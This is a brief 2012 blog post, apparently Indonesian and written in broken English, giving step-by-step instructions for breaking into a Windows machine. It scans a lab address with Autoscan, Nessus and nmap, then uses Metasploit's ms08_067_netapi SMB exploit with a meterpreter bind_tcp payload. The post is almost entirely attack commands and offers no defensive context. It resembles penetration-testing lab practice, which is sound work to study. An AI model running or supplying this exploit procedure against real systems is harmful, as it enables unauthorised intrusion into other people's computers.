Jumat, 27 Januari 2012

How to Get Windows Use Metasploit

1. Open Autoscan on backtrack application for search ip address.

2. Open Nessus to known a vulnerability.

3. Search port which have a weakness for exploitation and klik 445/tcp which have gap vulnerability.

4. Open a terminal and type #nmap -A T4 192.168.56.101
     and you can see port 135, 139 and 445. You can analysis for each file on port.

5. Open a terminal and type "#msfconsole" to entry metasploit

6. Type #use Windows/smb/ms08_067_netapi
    at "Windows/smb/ms08_067_netapi is Vulnerability on windows 
    after that type #show options

7. Type "#set RHOST 192.168.56.101" for  determine target for exploit
    and than type "#set payload windows/meterpreter/bind_tcp"
    last type "#exploit " for known the result exploit
     and we have been sucessfully into windows. :)




Tidak ada komentar:

Posting Komentar